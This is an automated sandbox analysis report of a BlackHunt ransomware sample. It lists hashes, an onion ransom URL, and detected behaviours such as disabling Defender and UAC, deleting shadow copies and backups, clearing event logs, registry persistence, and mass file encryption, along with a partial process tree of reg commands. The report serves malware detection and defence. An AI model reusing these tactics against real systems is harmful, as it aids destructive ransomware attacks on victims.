Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 23:21
Static task
static1
Behavioral task
behavioral1
Sample
51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe
Resource
win10v2004-20231215-en
General
-
Target
51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe
-
Size
707KB
-
MD5
7b609ce8e6795fcaa69ecceeb2a5c604
-
SHA1
82e532541c2836fc801ef8da447b7a936d83e6aa
-
SHA256
51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791
-
SHA512
c176aaa9fc6c205756ce7859955c0d27b07e666ff1c754dfb1f0742182ccf53acb680b8ea56bf0e8cbfd63f8493a63e1a8f730cfaf32b89b17ce5af2e5a214ef
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1F8kvnh:6uaTmkZJ+naie5OTamgEoKxLWwah
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 644 fsutil.exe 544 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection vssvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" vssvc.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1968 wevtutil.exe 2016 wevtutil.exe 2228 wevtutil.exe 204 wevtutil.exe 2328 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2816 bcdedit.exe 2488 bcdedit.exe 652 bcdedit.exe 488 bcdedit.exe -
Renames multiple (2895) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1984 wbadmin.exe 1440 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2748 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Y: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\S: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\N: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\A: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\U: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\R: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\H: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\J: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\K: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\O: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\I: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\X: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\B: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\M: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\W: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\P: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\Z: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\V: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\E: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\T: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\G: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\L: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_es.properties 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\RemoveWait.tif 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground_PAL.wmv 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jakarta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Honolulu 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\id\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\plugins\lua\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-previous-static.png 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-compat.xml_hidden 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-border.png 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2588 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2328 vssadmin.exe 1324 vssadmin.exe 2200 vssadmin.exe 1880 vssadmin.exe 1612 vssadmin.exe 1804 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 328 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 540 PING.EXE -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeRestorePrivilege 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeBackupPrivilege 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeTakeOwnershipPrivilege 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeAuditPrivilege 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeSecurityPrivilege 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeIncBasePriorityPrivilege 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeBackupPrivilege 676 vssvc.exe Token: SeRestorePrivilege 676 vssvc.exe Token: SeAuditPrivilege 676 vssvc.exe Token: SeBackupPrivilege 2744 wbengine.exe Token: SeRestorePrivilege 2744 wbengine.exe Token: SeSecurityPrivilege 2744 wbengine.exe Token: SeSecurityPrivilege 2328 wevtutil.exe Token: SeBackupPrivilege 2328 wevtutil.exe Token: SeSecurityPrivilege 1968 wevtutil.exe Token: SeBackupPrivilege 1968 wevtutil.exe Token: SeSecurityPrivilege 204 wevtutil.exe Token: SeSecurityPrivilege 2016 wevtutil.exe Token: SeBackupPrivilege 204 wevtutil.exe Token: SeBackupPrivilege 2016 wevtutil.exe Token: SeSecurityPrivilege 2228 wevtutil.exe Token: SeBackupPrivilege 2228 wevtutil.exe Token: SeDebugPrivilege 328 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2376 wrote to memory of 2756 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 29 PID 2376 wrote to memory of 2756 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 29 PID 2376 wrote to memory of 2756 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 29 PID 2376 wrote to memory of 2756 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 29 PID 2376 wrote to memory of 2796 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 31 PID 2376 wrote to memory of 2796 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 31 PID 2376 wrote to memory of 2796 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 31 PID 2376 wrote to memory of 2796 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 31 PID 2756 wrote to memory of 2716 2756 cmd.exe 33 PID 2756 wrote to memory of 2716 2756 cmd.exe 33 PID 2756 wrote to memory of 2716 2756 cmd.exe 33 PID 2376 wrote to memory of 2708 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 34 PID 2376 wrote to memory of 2708 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 34 PID 2376 wrote to memory of 2708 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 34 PID 2376 wrote to memory of 2708 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 34 PID 2376 wrote to memory of 3060 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 36 PID 2376 wrote to memory of 3060 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 36 PID 2376 wrote to memory of 3060 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 36 PID 2376 wrote to memory of 3060 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 36 PID 2796 wrote to memory of 2600 2796 cmd.exe 38 PID 2796 wrote to memory of 2600 2796 cmd.exe 38 PID 2796 wrote to memory of 2600 2796 cmd.exe 38 PID 2376 wrote to memory of 2868 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 39 PID 2376 wrote to memory of 2868 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 39 PID 2376 wrote to memory of 2868 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 39 PID 2376 wrote to memory of 2868 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 39 PID 2376 wrote to memory of 2588 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 136 PID 2376 wrote to memory of 2588 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 136 PID 2376 wrote to memory of 2588 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 136 PID 2376 wrote to memory of 2588 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 136 PID 2708 wrote to memory of 2804 2708 cmd.exe 42 PID 2708 wrote to memory of 2804 2708 cmd.exe 42 PID 2708 wrote to memory of 2804 2708 cmd.exe 42 PID 2376 wrote to memory of 1664 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 43 PID 2376 wrote to memory of 1664 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 43 PID 2376 wrote to memory of 1664 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 43 PID 2376 wrote to memory of 1664 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 43 PID 3060 wrote to memory of 2772 3060 cmd.exe 45 PID 3060 wrote to memory of 2772 3060 cmd.exe 45 PID 3060 wrote to memory of 2772 3060 cmd.exe 45 PID 2376 wrote to memory of 2832 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 44 PID 2376 wrote to memory of 2832 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 44 PID 2376 wrote to memory of 2832 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 44 PID 2376 wrote to memory of 2832 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 44 PID 2376 wrote to memory of 2488 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 147 PID 2376 wrote to memory of 2488 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 147 PID 2376 wrote to memory of 2488 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 147 PID 2376 wrote to memory of 2488 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 147 PID 2868 wrote to memory of 2788 2868 cmd.exe 48 PID 2868 wrote to memory of 2788 2868 cmd.exe 48 PID 2868 wrote to memory of 2788 2868 cmd.exe 48 PID 2376 wrote to memory of 2576 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 50 PID 2376 wrote to memory of 2576 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 50 PID 2376 wrote to memory of 2576 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 50 PID 2376 wrote to memory of 2576 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 50 PID 2376 wrote to memory of 2732 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 54 PID 2376 wrote to memory of 2732 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 54 PID 2376 wrote to memory of 2732 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 54 PID 2376 wrote to memory of 2732 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 54 PID 2376 wrote to memory of 2992 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 56 PID 2376 wrote to memory of 2992 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 56 PID 2376 wrote to memory of 2992 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 56 PID 2376 wrote to memory of 2992 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 56 PID 2376 wrote to memory of 1844 2376 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 58 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe"C:\Users\Admin\AppData\Local\Temp\51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2376 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
